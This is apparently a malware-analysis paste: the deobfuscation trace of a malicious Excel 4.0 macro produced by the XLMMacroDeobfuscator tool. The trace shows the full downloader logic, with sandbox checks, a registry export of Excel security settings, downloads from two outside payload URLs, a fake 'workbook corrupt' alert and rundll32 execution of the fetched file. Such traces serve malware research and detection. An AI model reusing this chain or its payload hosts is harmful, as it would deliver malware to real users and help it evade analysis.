dissectmalware

extracted macro

May 23rd, 2020
  1.  
  2. _ _______
  3. |\ /|( \ ( )
  4. ( \ / )| ( | () () |
  5. \ (_) / | | | || || |
  6. ) _ ( | | | |(_)| |
  7. / ( ) \ | | | | | |
  8. ( / \ )| (____/\| ) ( |
  9. |/ \|(_______/|/ \|
  10. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  11. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  12. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  13. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  14. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  15. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  16. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  17. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  18.  
  19.  
  20. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  21.  
  22. File: C:\Users\user\Downloads\1c95961c6b8bb6ce087116dcb2452258cc0c7b8e38883e5dc46cf001b3685545
  23.  
  24. [Loading Cells]
  25. auto_open: auto_open->ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!$FR$46752
  26. [Starting Deobfuscation]
  27. CELL:FR46752 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GM38479)
  28. CELL:FR46753 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AW47751)
  29. CELL:AW47751 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63704)
  30. CELL:AW47752 , FullEvaluation , GOTO(HD15139)
  31. CELL:HD15139 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BR18638)
  32. CELL:HD15140 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GR54551)
  33. CELL:GR54551 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HR28140)
  34. CELL:GR54552 , FullEvaluation , GOTO(FJ17553)
  35. CELL:FJ17553 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FW38376)
  36. CELL:FJ17554 , FullEvaluation , GOTO(AF3773)
  37. CELL:AF3773 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EB49332)
  38. CELL:AF3774 , FullEvaluation , GOTO(CT18705)
  39. CELL:CT18705 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CT18706)
  40. CELL:CT18706 , NotImplemented , APP.MAXIMIZE()
  41. CELL:CT18707 , FullEvaluation , GOTO(AS19863)
  42. CELL:AS19863 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS19864)
  43. CELL:AS19864 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)
  44. CELL:AS19865 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56527)
  45. CELL:R56527 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56528)
  46. CELL:R56528 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))
  47. CELL:R56529 , FullEvaluation , GOTO(HK26600)
  48. CELL:HK26600 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HK26601)
  49. CELL:HK26601 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)
  50. CELL:HK26602 , FullEvaluation , GOTO(AJ7450)
  51. CELL:AJ7450 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AJ7451)
  52. CELL:AJ7451 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)
  53. CELL:AJ7452 , FullEvaluation , GOTO(EK61293)
  54. CELL:EK61293 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EK61294)
  55. CELL:EK61294 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)
  56. CELL:EK61294 , FullEvaluation , [TRUE] GOTO(R[-11962]C[-9])
  57. CELL:EB49332 , End , CLOSE(FALSE)
  58. CELL:EK61294 , FullEvaluation , [FALSE]
  59. CELL:EK61295 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2438)
  60. CELL:DZ2438 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2439)
  61. CELL:DZ2439 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)
  62. CELL:DZ2439 , FullEvaluation , [TRUE] GOTO(R[46893]C[2])
  63. CELL:EB49332 , End , CLOSE(FALSE)
  64. CELL:DZ2439 , FullEvaluation , [FALSE]
  65. CELL:DZ2440 , FullEvaluation , GOTO(X52802)
  66. CELL:X52802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!X52803)
  67. CELL:X52803 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))
  68. CELL:X52804 , FullEvaluation , GOTO(AH63311)
  69. CELL:AH63311 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63312)
  70. CELL:AH63312 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))
  71. CELL:AH63313 , FullEvaluation , GOTO(GF60843)
  72. CELL:GF60843 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GF60844)
  73. CELL:GF60844 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))
  74. CELL:GF60845 , FullEvaluation , GOTO(GI38395)
  75. CELL:GI38395 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EL27848)
  76. CELL:GI38396 , FullEvaluation , GOTO(DR63558)
  77. CELL:DR63558 , FullEvaluation , FORMULA("=""C:\Users\Public\wtc2ww4T.reg""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DM32005)
  78. CELL:DR63559 , FullEvaluation , GOTO(DG40898)
  79. CELL:DG40898 , FullEvaluation , FORMULA("=R[-11208]C[-107]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-7051]C[-132]&"" /y""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IO39056)
  80. CELL:DG40899 , FullEvaluation , GOTO(HA24365)
  81. CELL:HA24365 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AB40744)
  82. CELL:HA24366 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20488)
  83. CELL:DE20488 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[20255]C[-81],R[18567]C[140],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20489)
  84. CELL:DE20489 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",GET.WORKSPACE(2)\Excel\Security /y,0,5)
  85. CELL:DE20490 , FullEvaluation , GOTO(AK37585)
  86. CELL:AK37585 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-5583]C[80])))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37588)
  87. CELL:AK37586 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37589)
  88. CELL:AK37587 , FullEvaluation , FORMULA("=NEXT()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37590)
  89. CELL:AK37588 , PartialEvaluation , WHILE("C:\Users\Public\wtc2ww4T.reg")
  90. CELL:AK37589 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
  91. CELL:AK37590 , PartialEvaluation , NEXT()
  92. CELL:AK37591 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49023)
  93. CELL:CJ49023 , FullEvaluation , FORMULA("=FOPEN(R[-17019]C[29])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49024)
  94. CELL:CJ49024 , PartialEvaluation , FOPEN("C:\Users\Public\wtc2ww4T.reg")
  95. CELL:CJ49025 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25789)
  96. CELL:B25789 , FullEvaluation , FORMULA("=FPOS(R[23234]C[86],215)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25790)
  97. CELL:B25790 , PartialEvaluation , FPOS("C:\Users\Public\wtc2ww4T.reg",215)
  98. CELL:B25791 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2879)
  99. CELL:DI2879 , FullEvaluation , FORMULA("=FREAD(R[46144]C[-25],255)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2880)
  100. CELL:DI2880 , PartialEvaluation , FREAD("C:\Users\Public\wtc2ww4T.reg",255)
  101. CELL:DI2881 , FullEvaluation , GOTO(J32571)
  102. CELL:J32571 , FullEvaluation , FORMULA("=FCLOSE(R[16452]C[78])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!J32572)
  103. CELL:J32572 , PartialEvaluation , FCLOSE("C:\Users\Public\wtc2ww4T.reg")
  104. CELL:J32573 , FullEvaluation , GOTO(HD11908)
  105. CELL:HD11908 , FullEvaluation , FORMULA("=FILE.DELETE(R[20096]C[-95])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HD11909)
  106. CELL:HD11909 , NotImplemented , FILE.DELETE(R[20096]C[-95])
  107. CELL:HD11910 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17958)
  108. CELL:AM17958 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-15079]C[74])),GOTO(R[31373]C[93]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17959)
  109. CELL:AM17959 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-15079]C[74])),GOTO(R[31373]C[93]),)
  110. CELL:AM17960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!A42769)
  111. CELL:A42769 , FullEvaluation , FORMULA("=""C:\Users\Public\v1grGU1.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!S26970)
  112. CELL:A42770 , FullEvaluation , GOTO(CK56936)
  113. CELL:CK56936 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GN29930)
  114. CELL:CK56937 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25454)
  115. CELL:GB25454 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4475]C[12],R[1515]C[-165],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25455)
  116. CELL:GB25455 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\v1grGU1.html",0,0)
  117. CELL:GB25456 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39286)
  118. CELL:CB39286 , FullEvaluation , FORMULA("=FILES(R[-12317]C[-61])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39287)
  119. CELL:CB39287 , PartialEvaluation , FILES("C:\Users\Public\v1grGU1.html")
  120. CELL:CB39288 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62675)
  121. CELL:EX62675 , FullEvaluation , FORMULA("=IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62676)
  122. CELL:EX62676 , FullBranching , IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)
  123. CELL:EX62676 , FullEvaluation , [TRUE] GOTO(R[-13344]C[-22])
  124. CELL:EB49332 , End , CLOSE(FALSE)
  125. CELL:EX62676 , FullEvaluation , [FALSE]
  126. CELL:EX62677 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!Z22543)
  127. CELL:Z22543 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM38736)
  128. CELL:Z22544 , FullEvaluation , GOTO(HK9570)
  129. CELL:HK9570 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DH15310)
  130. CELL:HK9571 , FullEvaluation , GOTO(GX34325)
  131. CELL:GX34325 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FA53097)
  132. CELL:GX34326 , FullEvaluation , GOTO(GB11054)
  133. CELL:GB11054 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS6496)
  134. CELL:GB11055 , FullEvaluation , GOTO(HI50545)
  135. CELL:HI50545 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FB46246)
  136. CELL:HI50546 , FullEvaluation , GOTO(DJ57354)
  137. CELL:DJ57354 , FullEvaluation , FORMULA("=""C:\Users\Public\qaaGrR.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EN33297)
  138. CELL:DJ57355 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GH65453)
  139. CELL:GH65453 , FullEvaluation , FORMULA("=""http://9dani.com/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HJ48131)
  140. CELL:GH65454 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BA58221)
  141. CELL:BA58221 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[15348]C[172],R[514]C[98],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AT32783)
  142. CELL:BA58222 , FullEvaluation , GOTO(BL32900)
  143. CELL:BL32900 , FullEvaluation , FORMULA("=FILES(R[30511]C[68])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BX2786)
  144. CELL:BL32901 , FullEvaluation , GOTO(I43306)
  145. CELL:I43306 , FullEvaluation , FORMULA("=IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!I20698)
  146. CELL:I43307 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CS63959)
  147. CELL:CS63959 , FullEvaluation , FORMULA("=""https://scsanwei.cn/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BH52763)
  148. CELL:CS63960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GZ44453)
  149. CELL:GZ44453 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17023]C[-64],R[-2443]C[20],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DT35740)
  150. CELL:GZ44454 , FullEvaluation , GOTO(BU55359)
  151. CELL:BU55359 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
  152. CELL:BU55360 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BG27079)
  153. CELL:BG27079 , FullEvaluation , FORMULA("=ALERT(R[30629]C[-97])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  154. CELL:BG27080 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CX17523)
  155. CELL:CX17523 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  156. CELL:CX17524 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DQ59477)
  157. CELL:DQ59477 , FullEvaluation , FORMULA("=R[-23286]C[132]&"",DllRegisterServer""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!L56583)
  158. CELL:DQ59478 , FullEvaluation , GOTO(EI28324)
  159. CELL:EI28324 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-1940]C[-243],R[53470]C[-239],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  160. CELL:EI28325 , FullEvaluation , GOTO(AT32783)
  161. CELL:AT32783 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://9dani.com/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
  162. CELL:AT32784 , FullEvaluation , GOTO(BX2786)
  163. CELL:BX2786 , PartialEvaluation , FILES("C:\Users\Public\qaaGrR.html")
  164. CELL:BX2787 , FullEvaluation , GOTO(I20698)
  165. CELL:I20698 , FullBranching , IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))
  166. CELL:I20698 , FullEvaluation , [TRUE]
  167. CELL:I20699 , FullEvaluation , GOTO(BH52763)
  168. CELL:BH52763 , FullEvaluation , "https://scsanwei.cn/wp-keys.php"
  169. CELL:BH52764 , FullEvaluation , GOTO(DT35740)
  170. CELL:DT35740 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://scsanwei.cn/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
  171. CELL:DT35741 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
  172. CELL:EC53342 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  173. CELL:EC53343 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  174. CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  175. CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  176. CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  177. CELL:H1174 , FullEvaluation , GOTO(L56583)
  178. CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
  179. CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  180. CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
  181. CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
  182. CELL:EB49332 , End , CLOSE(FALSE)
  183. CELL:I20698 , FullEvaluation , [FALSE] RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  184. CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  185. CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  186. CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  187. CELL:H1174 , FullEvaluation , GOTO(L56583)
  188. CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
  189. CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  190. CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
  191. CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
  192. CELL:EB49332 , End , CLOSE(FALSE)
  193. [END of Deobfuscation]
  194. time elapsed: 4.695186376571655